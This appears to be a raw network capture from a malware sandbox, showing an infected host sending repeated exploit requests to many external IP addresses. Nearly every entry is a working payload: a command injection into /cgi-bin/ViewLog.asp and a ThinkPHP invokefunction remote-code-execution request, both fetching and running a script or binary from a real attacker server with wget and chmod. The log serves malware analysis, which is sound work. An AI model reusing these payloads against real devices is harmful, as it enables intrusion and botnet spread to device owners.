Feb 25, 2024 19:03:52.549705029 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:01.509742022 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:19.941579103 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:56.805077076 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
504	192.168.2.15	35728	31.136.222.231	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.925015926 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:44.485862017 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:45.637790918 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:47.941770077 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:52.549740076 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:01.765723944 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:19.941579103 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:56.805083990 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
505	192.168.2.15	57722	88.247.118.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.929541111 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
506	192.168.2.15	53554	62.122.205.30	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.941009045 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:44.997785091 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:46.245851040 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:48.709739923 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:53.829755068 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:03.813581944 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:24.037399054 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:04.997001886 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
507	192.168.2.15	60234	62.234.184.55	23

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.969492912 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 32 36 20 30 32 3a 30 33 3a 34 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.20MAC Address: Server Time: 2024-02-26 02:03:43Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
508	192.168.2.15	43050	94.122.24.55	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.982172012 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
509	192.168.2.15	35308	94.122.63.5	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.988636017 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
510	192.168.2.15	50910	31.200.51.100	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.988876104 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
511	192.168.2.15	50368	95.214.178.141	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:44.016988039 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:45.445816040 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:47.141944885 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:50.501842022 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:57.413686991 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:10.981669903 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:38.373260021 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
512	192.168.2.15	54872	95.170.98.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:44.270433903 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
513	192.168.2.15	60326	62.234.184.55	23

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:44.592797041 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 32 36 20 30 32 3a 30 33 3a 34 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.20MAC Address: Server Time: 2024-02-26 02:03:43Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
514	192.168.2.15	60340	62.234.184.55	23

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:45.213670015 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 32 36 20 30 32 3a 30 33 3a 34 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.20MAC Address: Server Time: 2024-02-26 02:03:44Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
515	192.168.2.15	60344	62.234.184.55	23

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:45.852418900 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 32 36 20 30 32 3a 30 33 3a 34 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.20MAC Address: Server Time: 2024-02-26 02:03:45Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
516	192.168.2.15	36078	95.210.98.240	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:46.340488911 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
517	192.168.2.15	47032	95.249.53.244	80

Timestamp	Bytes transferred	Direction	Data
